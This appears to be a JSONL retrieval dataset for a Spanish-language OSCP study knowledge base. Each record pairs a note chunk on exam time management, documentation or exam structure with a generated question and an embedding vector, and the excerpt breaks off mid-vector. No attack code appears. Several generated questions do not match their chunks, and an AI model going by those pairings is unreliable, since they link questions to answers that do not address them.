"v": [0.22222, 0.04461, -0.13108, -0.13346, 0.05256, -0.03005, 0.08971, -0.01913, -0.0742, -0.11899, -0.04669, 0.01102, 0.04295, 0.00055, -0.00672, -0.03015, -0.00381, -0.02798, -0.00919, 0.02337, -0.06676, -0.04304, 0.02617, -0.09495, 0.03217, 0.10336, -0.06259, 0.05935, -0.12412, -0.16652, -0.06864, -0.03153, 0.11921, -0.06923, 0.07506, -0.05813, 0.03647, 0.023, 0.11765, 0.11197, 0.01917, -0.01957, 0.05314, -0.09522, 0.08881, -0.14792, 0.02933, -0.01138, 0.1261, -0.03801, -0.05534, 0.05182, -0.1385, 0.03918, 0.05191, -0.02779, 0.06505, 0.02638, -0.02475, -0.05834, -0.04046, 0.03723, 0.10369, -0.04166, -0.01634, -0.0744, 0.08562, 0.07415, 0.00018, 0.0932, -0.03564, -0.03522, 0.0126, 0.04577, 0.02352, -0.00282, -0.04974, 0.02254, 0.10486, 0.03852, 0.00723, 0.04589, 0.04499, 0.01245, -0.10573, -0.04316, -0.10414, -0.04384, -0.09402, -0.15427, 0.03747, 0.07004, -0.02018, 0.05674, -0.02873, -0.02671, 0.08838, 0.15296, -0.05931, 0.03312, 0.08019, 0.02144, -0.00485, 0.12965, -0.00028, 0.02359, 0.09251, -0.08166, -0.02736, 0.04254, -0.01825, 0.02565, -0.03358, -0.11713, -0.08726, 0.04669, -0.07513, -0.053, 0.04251, 0.00456, -0.11063, -0.04855, -0.10661, -0.04106, 0.12124, 0.02673, -0.0048, 0.06331, -0.01168, 0.0493, -0.06809, 0.00961, -0.04336, -0.10455, -0.11373, -0.09851, 0.00219, -0.0354, -0.01009, -0.05666, -0.01956, 0.10494, 0.02723, 0.05338, 0.11632, -0.01349, 0.00686, -0.03195, -0.11978, -0.01134, 0.03111, -0.0066, 0.0202, 0.03275, -0.04078, 0.00683, 0.04754, 0.011, -0.03048, 0.07925, -0.03564, 0.02158, -0.09639, 0.04469, 0.03673, -0.02982, -0.07077, -0.00589, 0.05585, 0.01524, -0.04148, 0.14149, -0.0151, -0.10608, -0.04436, -0.0285, -0.05912, -0.05038, -0.02274, -0.00727, -0.07061, 0.1072, -0.01825, -0.03814, -0.07254, -0.00562, -0.05655, -0.08982, 0.09534, 0.05201, -0.01579, 0.05585, -0.0466, -0.0262, 0.0429, -0.04039, -0.02743, 0.00496, 0.03688, -0.03742, -0.00116, -0.00607, 0.05995, -0.05697, 0.00533, 0.05893, -0.06544, 0.0547, 0.04115, 0.08675, 0.01257, -0.00913, 0.03942, -0.00481, -0.05592, 0.0174, -0.01233, 0.03068, 0.05912, 0.10029, 0.02095, 0.04585, 0.02728, 0.1001, 0.00854, -0.0413, 0.05029, 0.05318, 0.0594, 0.02992, -0.01497, -0.02059, -0.02837, -0.02766, -0.0074, 0.06991, -0.04794, -0.0056, 0.01586, -0.0579, 0.01885, -0.01458, 0.01182, -0.04495, -0.01923, -0.02138, -0.04181, 0.03606, 0.02741, -0.03067, -0.04292, 0.06158, 0.01879, -0.05835, 0.05081, 0.016]} +{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Reglas\n- **1.5h sin progreso = cambia de mΓ‘quina.** Cierra, vuelve mΓ‘s tarde con cabeza fresca.\n- Empieza por el **set de AD** (40 pts) con tiempo β†’ ver Estructura del examen.\n- Saca **todos los `user`** antes de pelear un root concreto.\n- Vigila el Egress filtering pronto: descubrir tarde que un puerto estΓ‘ bloqueado cuesta horas.", "indexar": "cΓ³mo montan un sistema seguro sin perder progreso, aplicando lΓ­mites estrictos al tiempo de actividad?", "v": [0.14345, 0.16375, -0.03822, -0.10362, 0.01936, 0.04208, -0.1194, -0.08933, -0.16651, -0.0677, -0.09802, 0.02659, 0.00705, 0.02949, 0.10691, -0.05445, 0.0193, -0.09612, -0.11655, 0.01376, -0.06255, -0.12732, 0.02116, -0.04991, 0.09247, 0.04511, 0.00345, -0.05841, -0.15119, 0.02758, 0.01266, 0.11601, 0.11143, -0.01886, -0.07449, -0.09536, -0.00734, 0.05626, 0.03936, -0.01774, 0.01678, -0.02405, 0.01576, -0.06261, -0.01657, -0.05995, -0.06023, 0.00856, -0.03714, -0.09748, -0.11599, 0.03244, -0.0086, -0.11141, 0.10264, -0.01472, 0.09119, -0.01832, 0.03064, -0.10641, -0.09558, 0.1263, -0.06275, 0.05726, 0.17672, -0.09526, 0.0886, -0.03443, -0.12496, 0.11973, 0.02883, -0.01524, -0.04707, 0.04701, -0.02727, -0.01675, 0.0106, 0.0009, -0.00393, -0.00808, -0.02116, 0.00647, -0.08891, 0.07912, -0.17098, -0.04925, 0.08074, -0.03467, 0.02351, 0.01929, 0.07053, -0.0263, 0.05229, -0.00508, -0.04448, -0.0576, -0.02371, 0.06136, 0.0005, 0.16392, 0.03272, -0.02422, -0.07555, 0.08065, 0.00614, -0.00553, 0.09432, 0.03416, 0.01839, -0.10959, -0.05862, -0.0548, -0.06598, -0.10206, -0.00857, 0.00957, -0.03628, -0.05079, -0.03257, -0.03791, -0.07974, 0.06628, 0.01459, -0.03188, 0.05349, -0.09365, -0.00748, 0.13061, -0.0281, 0.04937, -0.02643, 0.04106, -0.05201, -0.02121, -0.00779, 0.03922, -0.02085, 0.03643, -0.00637, -0.00897, 0.05006, 0.05247, -0.04603, -0.02268, 0.04451, -0.01003, 0.01691, -0.07474, -0.09364, 0.01307, -0.06825, 0.01758, -0.06, 0.07299, 0.01516, -0.02874, 0.05239, -0.09992, 0.11177, -0.02452, 0.07347, 0.08869, -0.0388, 0.01685, 0.04328, -0.00535, -0.01167, -0.02953, 0.07118, -0.0076, -0.02015, 0.02594, 0.04155, -0.03571, 0.01702, -0.03144, -0.0366, 0.0066, 0.08128, -0.01617, -0.09327, 0.11472, 0.01579, 0.00495, -0.00673, -0.01932, 0.02383, 0.00349, 0.00571, 0.08751, 0.03673, 0.00553, -0.02781, 0.03938, -0.07569, -0.10383, -0.02062, -0.02385, -0.01729, -0.04626, -0.03991, -0.03706, -0.01275, -0.06527, 0.02959, 0.04201, -0.00472, 0.10394, -0.03319, 0.12896, 0.05533, -0.03202, 0.03827, 0.06826, -0.05358, 0.00325, 0.05166, 0.02076, -0.03176, -0.01378, 0.01535, 0.02523, 0.03398, -0.01643, 0.01155, 0.00912, 0.03341, 0.07258, 0.02502, -0.02156, -0.00976, -0.00561, -0.08409, -0.01449, 0.09798, 0.04081, 0.09611, -0.03656, -0.0256, -0.07452, 0.06393, 0.11122, 0.0313, 0.01511, -0.05902, -0.0376, -0.09486, 0.04654, 0.00152, -0.08541, 0.0059, -0.03174, 0.00422, -0.02972, 0.07597, -0.06004]} +{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## DocumentaciΓ³n en vivo\n- Captura **TODO** mientras lo haces (Flameshot/Greenshot), **no al final** β€” al final no recuerdas el comando exacto.\n- Cada flag con hostname visible. Ver Reporte OSCP.", "indexar": "que programa sirve para capturar pantalla durante la ejecuciΓ³n de comandos sin tener que hacerlo despuΓ©s?", "v": [0.08038, 0.11661, -0.18324, -0.13445, 0.06683, -0.12184, 0.09478, 0.04068, -0.006, -0.04196, -0.08384, 0.02592, 0.06088, -0.06116, -0.01656, 0.0584, 0.11236, 0.01553, 0.04505, 0.00684, 0.01108, 0.01036, 0.07747, -0.09006, -0.0071, 0.0378, 0.04291, 0.04589, -0.11623, -0.11213, -0.00772, 0.06413, 0.1023, -0.11863, 0.01768, -0.04833, -0.07466, -0.02081, -0.06622, 0.153, -0.01192, 0.1395, -0.16585, 0.02499, 0.01799, -0.03785, 0.14475, 0.04182, 0.03083, -0.09361, 0.022, 0.07056, -0.0417, -0.03386, -0.04843, -0.07411, 0.09107, -0.09919, 0.00242, 0.00601, 0.00737, -0.05666, 0.06334, 0.0878, 0.05904, -0.05789, 0.01482, -0.03392, -0.02892, 0.0825, -0.00347, 0.06825, -0.02764, 0.06698, 0.01446, -0.04332, -0.11711, -0.04399, 0.09572, -0.04628, -0.05525, -0.05967, -0.10415, 0.05605, -0.12159, -0.04059, -0.03997, -0.05045, -0.03758, -0.13171, 0.03216, 0.03194, 0.00093, 0.05034, 0.09823, -0.01844, 0.06217, 0.03186, 0.0785, 0.09596, 0.08615, -0.13023, -0.11071, 0.08649, -0.07, 0.12318, 0.04815, -0.10943, -0.03379, 0.02027, -0.04089, -0.03574, -0.07564, -0.03824, -0.13774, -0.04622, -0.0163, -0.12334, 0.00996, -0.03651, -0.14628, 0.0293, -0.02782, -0.02102, 0.09676, 0.01483, -0.05402, 0.0229, -0.0035, 0.07226, 0.01045, 0.01355, 0.0813, -0.01491, -0.09563, -0.00174, 0.08608, 0.01408, -0.06246, -0.1804, 0.02553, 0.02821, -0.01907, -0.0292, 0.04699, -0.02392, 0.0579, -0.05958, -0.04551, 0.08097, 0.08022, 0.0126, -0.06001, 0.04157, -0.01435, -0.0213, -0.03432, -0.00535, -0.0394, 0.06807, -0.02259, -0.04576, -0.07669, 0.00594, 0.07433, -0.09254, -0.05953, -0.03454, 0.05943, 0.07304, -0.01141, 0.05456, 0.01162, -0.08417, 0.01477, -0.04716, 0.03034, 0.00209, 0.04582, -0.03369, -0.08707, 0.13058, 0.04244, -0.00499, 0.01568, -0.03627, -0.04367, -0.00723, -0.05648, 0.01255, 0.01562, 0.04547, -0.03351, -0.00056, -0.02531, -0.0903, -0.00442, 0.04538, 0.05993, -0.017, -0.0551, -0.00537, 0.0257, -0.0352, 0.06204, 0.04012, -0.05188, 0.08232, 0.03451, 0.05026, -0.0285, 0.04293, 0.08598, 0.01397, -0.01503, -0.0755, 0.07393, 0.04057, -0.0264, 0.05606, 0.05281, 0.0046, 0.03506, 0.04852, 0.00372, -0.03385, 0.02719, 0.0226, -0.00216, -0.02213, 0.00333, 0.00439, 0.00938, 0.00029, -0.00292, -0.00255, -0.02472, -0.02269, -0.02444, -0.06912, -0.0092, 0.04203, -0.02101, -0.06083, -0.01862, -0.02119, -0.06011, 0.02255, 0.05052, -0.06053, -0.0514, 0.07056, 0.053, 0.00608, -0.02054, 0.02006]} +{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## DocumentaciΓ³n en vivo\n- Captura **TODO** mientras lo haces (Flameshot/Greenshot), **no al final** β€” al final no recuerdas el comando exacto.\n- Cada flag con hostname visible. Ver Reporte OSCP.", "indexar": "hay alguna herramienta gratuita que muestre los hostnames en las capturas de pantalla en tiempo real?", "v": [0.10525, 0.07637, -0.07462, -0.15719, 0.0205, -0.07825, -0.04261, -0.04092, 0.03918, -0.06086, -0.09175, -0.04329, 0.03566, 0.0057, 0.08216, 0.04268, 0.10642, -0.02931, 0.01443, -0.03448, -0.08662, -0.00087, -0.13309, 0.0393, -0.09382, -0.13648, 0.04403, 0.04977, -0.22081, -0.03957, 0.08556, 0.02724, 0.01849, -0.04037, -0.05904, -0.14215, 0.07114, -0.00988, 0.0062, 0.07885, 0.12557, 0.05648, -0.05153, 0.00477, -0.0419, -0.01092, -0.02882, 0.00011, -0.02762, -0.04374, -0.05305, -0.09826, -0.15155, -0.02617, -0.01768, -0.13187, 0.20178, -0.09143, -0.01717, -0.09918, -0.11626, 0.00546, 0.003, 0.00565, -0.04104, -0.02266, 0.01687, 0.03477, -0.1151, 0.03484, 0.02779, 0.07142, 0.08747, 0.03119, 0.04128, -0.00469, -0.03887, -0.09113, 0.01932, 0.00318, -0.00153, -0.10578, -0.02801, 0.0393, -0.15132, -0.03926, 0.0004, -0.12417, -0.02548, -0.08495, 0.08429, 0.10624, -0.00077, 0.12422, 0.03144, -0.09973, 0.0742, 2e-05, 0.00228, 0.01147, 0.10858, 2e-05, -0.07817, 0.0668, 0.03037, 0.13634, -0.0473, -0.08374, -0.07204, -0.01723, -0.00772, 0.02197, -0.0701, 0.04722, -0.04639, -0.01296, 0.04419, -0.0892, 0.03423, -0.06408, -0.05209, -0.00623, -0.05954, -0.10327, 0.03078, 0.06077, -0.04874, -0.01231, 0.02585, -0.10046, -0.03561, -0.07515, -0.0474, 0.02365, -0.05748, -0.08861, 0.01923, -0.06767, -0.02758, -0.12122, -0.03436, 0.04221, -0.05061, -0.09031, 0.04899, 0.05035, -0.00275, -0.04656, -0.0734, 0.02126, 0.05223, -0.02934, 0.02197, 0.07218, -0.00077, 0.07256, 0.00981, -0.02024, -0.0727, 0.00686, 0.03027, -0.087, -0.06275, -0.04241, -0.00057, -0.08684, 0.03259, 0.04788, 0.06857, 0.05577, -0.00894, 0.09664, -0.00969, -0.07723, -0.03292, -0.0014, 0.00171, -0.03603, -0.01184, -0.16266, 0.02495, 0.07547, 0.03681, -0.04044, 0.01634, -0.00672, -0.04262, -0.00576, -0.06426, 0.02974, 0.0549, -0.00272, -0.06681, 0.03401, 0.00139, -0.01947, -0.01552, -0.00178, 0.02377, -0.01896, -0.06228, -0.09998, 0.02896, -0.03874, 0.00982, 0.05864, -0.02249, 0.11731, -0.01375, 0.04361, -0.06367, 0.06355, 0.01288, -0.09339, -0.00523, -0.00989, 0.07638, -0.01466, -0.05385, -0.00083, 0.0681, 0.02116, 0.05471, 0.04431, -0.05508, 0.03965, 0.08823, 0.07486, 0.0024, -0.04258, -0.01545, 0.00387, 0.01509, -0.04508, 0.00706, -0.01439, 0.05814, -0.05134, -0.0556, -0.00504, 0.00874, 0.05059, 0.01133, 0.00658, 0.00462, -0.03669, -0.06542, -0.02306, 0.0291, -0.09051, -0.06275, 0.02376, 0.05367, -0.01666, -0.01845, 0.02941]} +{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Anti rabbit-hole\n- EnumeraciΓ³n exhaustiva primero, luego un vector a la vez β†’ Trampas de enumeraciΓ³n.\n- Si un vector \"tiene que funcionar\" y llevas 1h, probablemente es un seΓ±uelo.\n\nRelacionado: MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "que herramienta sirve para hacer una enumeraciΓ³n exhaustiva de redes antes de atacar?", "v": [-0.04422, 0.0269, -0.25057, -0.1363, 0.08948, -0.03269, -0.11861, 0.05378, -0.01499, -0.042, -0.06848, -0.15882, -0.00423, -0.04024, 0.14084, 0.04828, 0.0337, -0.0175, 0.18116, 0.02883, 0.02197, 0.05958, -0.07282, -0.02559, -0.14367, 0.00388, 0.02112, 0.05655, -0.22957, 0.04993, -0.12395, 0.04499, 0.06396, -0.0868, -0.04816, -0.02508, -0.02191, 0.06398, 0.01873, 0.12306, -0.00427, 0.05837, -0.17362, -0.01915, 0.04595, 0.06996, -0.05847, -0.02337, 0.00116, 0.07404, -0.03545, -0.05695, -0.15485, -0.05207, -0.09556, -0.09167, 0.11071, -0.19434, -0.05876, -0.07993, -0.03442, -0.05776, 0.00466, -0.04689, 0.04933, 0.01965, -0.04438, -0.03099, -0.04449, 0.11098, -0.00607, 0.08558, 0.04156, -0.03146, 0.00851, -0.01429, 0.01936, 0.10115, 0.05656, 0.04867, -0.00114, -0.08099, -0.12099, -0.01573, -0.07967, -0.02389, 0.11703, -0.0492, -0.01596, -0.10974, -0.05593, 0.08424, -0.07606, -0.02116, -0.00218, 0.01832, 0.05514, -0.0719, 0.00747, -0.02195, 0.08215, -0.07831, -0.0992, 0.04468, -0.02903, -0.00483, -0.0298, -0.02244, -0.02647, -0.12067, 0.0443, -0.013, -0.00513, -0.0179, -0.01087, 0.00174, -0.09821, -0.00466, 0.00236, 0.01851, 0.01208, 0.01504, -0.08601, 0.00932, 0.02071, 0.01085, -0.08205, 0.0418, 0.02804, -0.10269, 0.01607, 0.01168, -0.00309, -0.02752, -0.0697, -0.06171, 0.04542, -0.14996, -0.04561, -0.0939, -0.00314, 0.02691, -0.08065, -0.09284, 0.04306, 0.0669, 0.04403, -0.0666, -0.07643, -0.00077, 0.02152, -0.01024, -0.01326, 0.01554, -0.02274, 0.01306, -0.04229, 0.03468, -0.04633, 0.05118, -0.05158, -0.05273, 0.03695, -0.01161, 0.01037, -0.03094, -0.00141, 0.00338, 0.04066, 0.06341, 0.04249, 0.05878, 0.01422, -0.02748, -0.00097, 0.00799, -0.03133, 0.00023, 0.01672, -0.00523, -0.04086, -0.10036, -0.05137, -0.00928, -0.01125, -0.03813, 0.04641, -0.01273, -0.00741, 0.07769, -0.06378, -0.00547, 0.0459, 0.00647, 0.08608, -0.04508, 0.0068, -0.02883, 0.06273, -0.0081, 0.0065, -0.04507, -0.05119, -0.03184, 0.01522, 0.07562, -0.03741, -0.07571, -0.01336, 0.04823, -0.00639, 0.01445, 0.04271, -0.02421, -0.0541, -0.04314, 0.03154, -0.00469, -0.02214, -0.00138, 0.03559, -0.00105, 0.02118, 0.02497, -0.01078, 0.07495, -0.04642, -0.07166, 0.00244, -0.05204, 0.05416, -0.13212, 0.02541, -0.01923, -0.01008, -0.09744, 0.05274, -0.01012, -0.08564, 0.01042, -0.01568, -0.00736, 0.00824, 0.0496, -0.04266, -0.05755, -0.0207, -0.04365, -0.02261, -0.09912, -0.05651, -0.01187, 0.07582, 0.05235, 0.04414, -0.0217]} +{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Anti rabbit-hole\n- EnumeraciΓ³n exhaustiva primero, luego un vector a la vez β†’ Trampas de enumeraciΓ³n.\n- Si un vector \"tiene que funcionar\" y llevas 1h, probablemente es un seΓ±uelo.\n\nRelacionado: MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "cual programa detecta si un vector de ataque se repite para que sea solo un seΓ±uelo?", "v": [-0.09653, 0.0516, -0.16309, -0.08643, 0.02639, -0.05078, -0.03831, -0.04555, 0.08866, -0.06074, -0.02243, -0.13319, -0.11475, 0.00012, 0.04993, 0.03308, -0.02253, 0.00192, 0.13323, -0.09858, 0.00196, -0.05877, 0.08634, -0.03724, 0.00359, 0.10401, -0.01286, 0.18312, 0.0335, -0.16363, -0.01221, -0.05384, 0.0967, -0.09163, 0.00247, -0.02452, 0.03734, 0.01537, 0.0485, 0.16272, 0.00486, -0.03476, -0.21978, -0.00599, 0.03745, -0.00591, 0.0363, -0.04781, 0.08734, -0.04333, -0.0117, 0.17731, -0.0666, 0.00349, 0.07611, -0.06448, 0.00155, -0.07335, 0.02312, -0.03707, -0.01751, 0.02957, 0.05694, -0.11621, 0.03622, 0.0044, 0.06391, 0.02162, -0.08556, -0.08725, 0.04959, 0.01296, 0.04454, 0.02674, 0.04145, 0.01115, 0.0766, -0.03117, 0.06128, -0.04811, -0.06474, -0.04792, -0.06862, 0.07722, -0.14539, -0.00726, 0.02975, -0.06047, -0.0158, -0.15301, -0.01207, 0.08333, 0.0137, 0.04086, 0.00264, -0.0313, 0.11607, -0.07852, -0.04696, 0.12627, 0.09408, -0.09988, -0.15643, 0.09088, 0.00865, 0.08738, -0.07091, 0.01467, -0.04122, -0.03561, 0.00959, -0.05462, -0.05428, -0.05603, 0.00264, -0.03017, -0.04465, -0.00297, -0.03821, -0.012, -0.12265, 0.01423, -0.07526, 0.06156, -0.04063, 0.01107, -0.05634, 0.04866, -0.02622, 0.04763, -0.00614, 0.07016, 0.01412, -0.02605, -0.08396, 0.00088, -0.01889, -0.09005, -0.05487, 0.01875, 0.04682, 0.1421, 0.05717, 0.02678, -0.03173, -0.02649, 0.00454, -0.04663, -0.08328, 0.07646, -0.05035, 0.06305, -0.02215, 0.1128, -0.10706, -0.04255, 0.04184, -0.02275, -0.07155, 0.06285, 0.02393, 0.01946, -0.08497, 0.01153, 0.07257, -0.02767, 0.01928, -0.04082, 0.1357, 0.07315, -0.00462, 0.04731, 0.03126, -0.08869, -0.03918, -0.07222, -0.0282, -0.12439, 0.01708, -0.0154, -0.06848, 0.00384, 0.01258, 0.01014, 0.01617, -0.04338, 0.00318, 0.07142, 0.01233, 0.02751, 0.03686, -0.00083, -0.01819, 0.02938, -0.01421, -0.029, -0.02944, 0.04911, 0.01173, 0.00643, -0.03184, -0.00734, -0.00846, 0.00167, 0.05593, 0.06884, -0.04185, -0.04568, 0.0479, 0.11516, 0.03223, -0.01168, 0.07492, 0.00657, -0.04947, -0.03028, -0.00501, 0.02027, 0.04152, 0.01876, 0.01573, -0.00962, 0.03948, 0.04028, -0.04356, -0.09119, 0.02179, 0.03092, 0.07769, 0.03879, -0.02755, -0.07174, 0.04427, -0.07305, -0.01646, -0.00044, 0.03552, -0.05112, -0.04023, -0.04878, 0.02664, 0.03442, 9e-05, -0.05076, -0.03819, -0.01211, -0.05606, 0.05061, -0.02638, 0.03294, -0.05532, 0.02275, 0.02076, -0.08047, 0.11389, 0.01223]} +{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Anti rabbit-hole\n- EnumeraciΓ³n exhaustiva primero, luego un vector a la vez β†’ Trampas de enumeraciΓ³n.\n- Si un vector \"tiene que funcionar\" y llevas 1h, probablemente es un seΓ±uelo.\n\nRelacionado: MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "con que puedo aplicar la metodologia de anti rabbit-hole en mis pruebas de penetracion?", "v": [-0.07575, 0.03943, -0.24218, -0.17654, -0.0142, -0.02357, 0.01273, 0.04328, -0.11793, -0.02574, -0.03505, -0.01928, 0.14124, 0.04814, 0.04157, 0.02093, -0.01315, -0.04098, -0.11597, -0.07273, -0.05038, -0.14446, -0.06987, -0.03305, -0.05297, 0.14948, 0.08481, 0.15717, 0.02474, -0.06682, -0.11968, -0.06586, -0.05634, -0.01103, -0.21229, 0.01501, -0.0802, -0.05885, -0.00108, 0.16322, -0.01018, -0.04662, -0.10592, 0.07261, 0.03529, -0.0285, 0.03411, -0.04547, -0.09767, 0.05735, -0.02921, 0.00548, -0.09091, -0.00788, -0.0397, -0.14547, -0.09557, 0.00463, 0.01906, -0.01319, -0.06243, -0.04189, -0.05863, -0.01307, 0.12488, -0.04356, 0.07823, 0.04581, -0.03175, 0.09765, 0.02874, 0.02655, -0.07022, -0.07657, -0.1092, 0.00766, -0.00804, 0.04038, -0.01821, -0.01683, -0.07396, 0.02154, -0.05806, 0.00904, -0.08084, -0.01835, 0.0803, -0.14941, 0.135, -0.04925, -0.03755, 0.05073, 0.0196, 0.01762, -0.02613, -0.12545, 0.06965, -0.01212, -0.01518, -0.10802, 0.05325, -0.00583, -0.05424, 0.0983, -0.03564, -0.08165, -0.08291, -0.02503, 0.018, -0.0831, -0.02149, 0.00456, -0.10914, -0.05395, -0.07125, 0.01195, 0.00064, 0.02761, -0.08715, -0.09173, -0.09657, 0.01802, -0.10011, -0.04431, -0.00984, -0.07951, 0.01621, -0.02396, -0.01762, 0.08135, 0.02762, 0.02596, -0.09278, 0.10523, 0.03596, 0.03063, -0.01709, -0.00638, -0.06067, 0.01728, -0.01929, 0.04321, 0.02669, -0.04282, 0.02315, 0.05777, -0.06635, -0.0798, -0.02706, -0.03416, -0.05135, -0.03895, 0.04188, 0.11725, -0.04246, -0.12044, 0.12705, -0.00825, 0.03315, 0.07328, -0.00754, 0.00366, -0.0122, 0.02226, -0.01476, 0.036, -0.01358, -0.10568, -0.05963, -0.0058, -0.00903, 0.08348, 0.01504, -0.02611, 0.06812, 0.03912, 0.00247, -0.08116, 0.00994, -0.01678, 0.04582, -0.00463, -0.01075, -0.09815, 0.11066, -0.0305, 0.05436, 0.05456, 0.03538, 0.0787, 0.02462, -0.03436, -0.0204, 0.0048, -0.00631, -0.04122, 0.0243, 0.04067, -0.02301, 0.01221, -0.00953, -0.00379, 0.02444, -0.05371, -0.0075, 0.04818, -0.00425, 0.0149, 0.00776, 0.05911, 0.0386, -0.00747, 0.04907, -0.00698, -0.08831, -0.01179, 0.03209, 0.0545, -0.02379, 0.05478, 0.05689, 0.00864, 0.02185, 0.019, -0.11234, 0.0308, -0.07864, -0.01843, -0.01282, -0.01251, 0.00996, -0.0144, -0.05232, 0.02126, 0.01764, -0.007, -0.03179, -0.05553, -0.02356, -0.06935, -0.01869, 0.05232, 0.00766, 0.03723, 0.00707, -0.04193, -0.00556, -0.05187, 0.03093, 0.01086, -0.03362, -0.02655, 0.01856, -0.07294, 0.03863, -0.02322]} +{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## ComposiciΓ³n\n- **Set de Active Directory = 40 puntos seguidos.**\n - 3 mΓ‘quinas **encadenadas**. Si te atascas en la mΓ‘quina 1, no avanzas a 2 y 3.\n - **Empieza por aquΓ­ con tiempo.** Es todo-o-nada por cadena.\n - Ver Active Directory para el flujo completo.\n- **3 standalones independientes**, 20 pts cada una.\n - `user` (10 pt = `local.txt`) + `root/system` (10 pt = `proof.txt`).\n - **Saca el `user` de las 3 ANTES** de obsesionarte con el root de una.", "indexar": "quΓ© programa hay para montar Active Directory?", "v": [-0.05891, 0.09059, -0.04738, -0.1945, -0.08444, -0.02659, -0.01098, 0.02412, -0.22451, -0.0081, 0.08435, -0.07371, -0.02615, -0.11392, 0.06585, 0.01835, 0.09997, -0.16455, 0.00257, -0.00436, -0.03515, 0.06316, -0.02847, -0.0272, 0.02897, 0.09074, -0.01628, -0.06885, -0.00651, -0.0045, 0.11025, 0.08229, 0.0609, -0.01512, 0.04579, -0.09498, 0.03478, -0.06921, 0.11072, -0.00133, -0.09584, -0.02181, -0.03941, 0.07765, 0.05708, 0.09772, 0.09182, -0.15482, 0.02555, 0.06259, 0.05464, 0.04657, 0.05066, 0.01458, 0.10724, -0.04642, -0.11255, -0.07266, -0.04179, -0.09335, 0.0129, 0.02462, -0.04733, -0.02469, -0.0621, -0.05366, 0.14739, -0.06571, -0.12445, 0.02911, 0.00584, -0.10836, 0.06008, 0.12931, -0.00882, 0.00969, 0.06608, -0.06121, -0.05615, 0.03018, 0.04304, -0.00399, 0.08571, 0.12265, -0.08472, -0.07751, 0.0243, -0.07759, -0.02637, -0.01127, 0.05467, 0.11354, -0.01725, 0.09014, 0.0238, -0.05311, 0.15415, 0.15284, 0.0926, 0.0639, -0.07132, -0.05967, -0.00452, 0.16645, -0.01474, 0.08482, 0.01448, 0.0712, -0.08538, 0.10964, -0.01028, -0.01753, -0.04164, -0.05198, -0.01105, 0.02321, -0.03795, -0.00537, 0.0324, -0.00078, -0.12714, 0.10636, 0.04133, 0.06058, 0.07543, -0.00253, 0.0376, 0.11083, -0.07261, 0.10852, 0.02248, 0.01123, 0.02285, -0.10799, -0.06972, -0.05828, 0.01031, 0.01778, 0.00115, -0.08294, -0.01595, -0.05032, 0.02556, 0.02486, -0.01495, -0.0091, 0.06609, -0.00282, 0.01183, 0.08536, 0.04526, 0.09687, 0.02685, 0.001, -0.00451, -0.01112, 0.0403, 0.00975, -0.01714, 0.06144, -0.02054, 0.00655, -0.0357, -0.0701, 0.02971, -0.03565, -0.06994, 0.02013, 0.07575, 0.1302, -0.0052, 0.10687, 0.08298, -0.10117, 0.01195, 0.01503, 0.01275, -0.03444, 0.06466, -0.0162, -0.05174, 0.03925, 0.07739, 0.05501, -0.0217, 0.00022, 0.00677, 0.0163, -0.00444, -0.00735, -0.01345, 0.01867, -0.0074, -0.03548, 0.01116, -0.0629, 0.00473, -0.01735, 0.0561, -0.04838, -0.00783, 0.01378, 0.04859, -0.00672, 0.04469, 0.04382, -0.02743, 0.06903, 0.11628, 0.09514, -0.03758, -0.02634, 0.03976, 0.05862, -0.04503, 0.02912, -0.02404, 0.07036, 0.00231, 0.07991, -0.01246, -0.01037, 0.01733, 0.0401, 0.0121, -0.02807, 0.00609, 0.017, 0.04478, 0.03432, -0.01994, -0.08291, 0.00726, -0.02045, -0.00745, -0.00102, 0.01395, 0.00822, 0.00665, -0.0469, 0.00153, 0.06924, 0.03402, -0.02026, -0.06604, 0.02803, 0.00899, 0.05146, 0.00392, 0.00804, -0.02183, -0.01179, -0.04757, -0.06563, -0.02854, 0.0069]} +{"tipo": "pregunta", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## ComposiciΓ³n\n- **Set de Active Directory = 40 puntos seguidos.**\n - 3 mΓ‘quinas **encadenadas**. Si te atascas en la mΓ‘quina 1, no avanzas a 2 y 3.\n - **Empieza por aquΓ­ con tiempo.** Es todo-o-nada por cadena.\n - Ver Active Directory para el flujo completo.\n- **3 standalones independientes**, 20 pts cada una.\n - `user` (10 pt = `local.txt`) + `root/system` (10 pt = `proof.txt`).\n - **Saca el `user` de las 3 ANTES** de obsesionarte con el root de una.", "indexar": "con quΓ© puedo crear mΓ‘quinas encadenadas para un juego?", "v": [-0.13793, 0.01122, -0.04381, -0.04235, -0.14491, 0.00914, -0.07908, 0.10134, -0.0375, -0.13444, -0.10266, -0.06028, -0.01554, -0.05795, -0.01607, 0.04255, 0.1118, 0.0175, 0.06035, 0.04944, 0.00685, -0.10487, -0.0409, -0.07485, 0.01714, 0.09751, 0.12581, 0.01314, -0.26292, 